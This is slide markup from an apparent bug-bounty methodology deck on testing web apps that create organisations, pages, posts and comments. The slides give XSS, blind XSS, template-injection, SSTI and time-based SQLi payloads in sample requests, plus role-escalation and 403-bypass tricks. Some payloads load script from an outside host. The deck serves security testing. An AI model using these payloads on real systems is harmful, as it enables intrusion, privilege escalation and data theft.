            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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      This Token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660" name="Google Shape;660;p6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61" name="Google Shape;661;p6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63" name="Google Shape;66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6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65" name="Google Shape;66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Creating ORG , Page , Post OR Comment , Try To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Replace Role Of User To Admin</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> If You Got 403 Forbidden , Try To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Send Empty e.g. []</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Bypass It</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="17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700">
              <a:solidFill>
                <a:srgbClr val="0B5394"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="671" name="Google Shape;671;p6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/Create-ORG-PAGE-POST-PAGE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application/json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{"email":"me@gmail.com",</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"role":[]</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}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672" name="Google Shape;672;p6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73" name="Google Shape;673;p6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675" name="Google Shape;67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6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77" name="Google Shape;677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6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83" name="Google Shape;683;p6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6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685" name="Google Shape;685;p6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Use API Of The Company To Do Actions With Your Payloads</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e.g. Search About API Endpoints</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Create - Edit - Remove ORG , Page , Post OR Comment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6" name="Google Shape;68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688" name="Google Shape;688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000" y="2675525"/>
            <a:ext cx="4973700" cy="20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8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68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696" name="Google Shape;696;p68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697" name="Google Shape;69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68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68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68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Create Wi</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>th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Blind XSS Payloads e.g. "&gt;&lt;img src=//me.xss.ht&gt;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>
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> "&gt;&lt;script&gt;$.getScript</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("//me.xss.ht")&lt;/script&gt;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>
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Payloads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On All Field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Blind XSS On Admin Panel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51" name="Google Shape;351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/Create-ORG-PAGE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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;&lt;img src=//me.xss.ht&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;address</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;&lt;img src=//me.xss.ht&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;describe=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;&lt;img src=//me.xss.ht&gt;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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>token=Anti-CSRF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53" name="Google Shape;353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5" name="Google Shape;35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7" name="Google Shape;35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9" name="Google Shape;359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1" name="Google Shape;361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64025" y="39399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4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255350" y="42771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5" name="Google Shape;365;p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64025" y="433745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Creating ORG , Page , Post OR Comment , Try To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Inject XSS Payloads e.g.  %3c%2fscript%3e%3cscript%3ealert(1)%3c%2fscript%3e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On Other Parameters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71" name="Google Shape;371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/create-ORG-PAGE-POST-COMMENT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name=me&amp;&amp;token=Anti-CSRF&amp;parameter=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%3c%2fscript%3e%3cscript%3ealert(1)%3c%2fscript%3e</a:t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372" name="Google Shape;372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3" name="Google Shape;373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5" name="Google Shape;37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Appending Post Or Comment Try To Inject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000">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS Payloads e.g. &lt;script&gt;alert();&lt;/script&gt;"&gt;&lt;&lt;script&gt;alert();&lt;/script&gt;img src=x onerror=alert();&gt;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000">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;quot;&amp;gt;&amp;lt;img src=x onerror=confirm(1);&amp;gt;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83" name="Google Shape;383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/append-POST-COMMENT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content=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;alert();&lt;/script&gt;"&gt;&lt;&lt;script&gt;alert();&lt;/script&gt;img src=x onerror=alert();&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;id=number&amp;&amp;token=CSRF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87" name="Google Shape;38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1" name="Google Shape;39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Create With</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> XSS Payloads As Headline e.g. "&gt;&lt;script&gt;alert(1337)&lt;/script&gt;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[[constructor.constructor('alert(1)')()]] </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get Stored XSS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97" name="Google Shape;397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/append-POST-COMMENT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content=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;&lt;script&gt;alert(1337)&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;id=number&amp;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token=Anti-CSRF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9" name="Google Shape;399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1" name="Google Shape;40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3" name="Google Shape;403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4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5" name="Google Shape;405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4025" y="3067788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7" name="Google Shape;407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Create With</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> B</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lind Template Injection Payloads</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{{constructor.constructor('import("http://me.xss.ht")')()}}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On All Field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Blind XSS On The Admin Panel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13" name="Google Shape;413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/Create-ORG-PAGE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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{{constructor.constructor('import("http://me.xss.ht")')()}}</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;address=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{{constructor.constructor('import("http://me.xss.ht")')()}}</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;describe=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{{constructor.constructor('import("http://me.xss.ht")')()}}</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;token=Anti-CSRF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14" name="Google Shape;414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15" name="Google Shape;415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17" name="Google Shape;41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9" name="Google Shape;41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Creating ORG , Page , Post OR Comment </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Inject</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> SSTI Payloads e.g. {{7*7}} </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> {7*7}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${7*7} </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>On All Field To Get RCE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25" name="Google Shape;425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/Create-ORG-PAGE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name=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{{7*7}}</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;address=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{{7*7}}</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;describe=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{{7*7}}</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a: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token=Anti-CSRF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26" name="Google Shape;426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7" name="Google Shape;427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9" name="Google Shape;42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1" name="Google Shape;43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3" name="Google Shape;43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7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35" name="Google Shape;435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While Creating ORG , Page , Post OR Comment Try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EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Inject</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Time-Based SQLi Payloads e.g. -sleep(10)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-benchmark(1000000000,1-1) </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>On All Field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 Get SQLi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41" name="Google Shape;441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POST /</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>append-POST-COMMENT</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> HTTP/1.1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Host: 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Content-Type: application/x-www-form-urlencoded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Content-Length: Number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1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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content</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-sleep(10)</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;id=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-sleep(10)</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;parameters</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-sleep(10)</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;token=CSRF</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="442" name="Google Shape;442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3" name="Google Shape;443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45" name="Google Shape;44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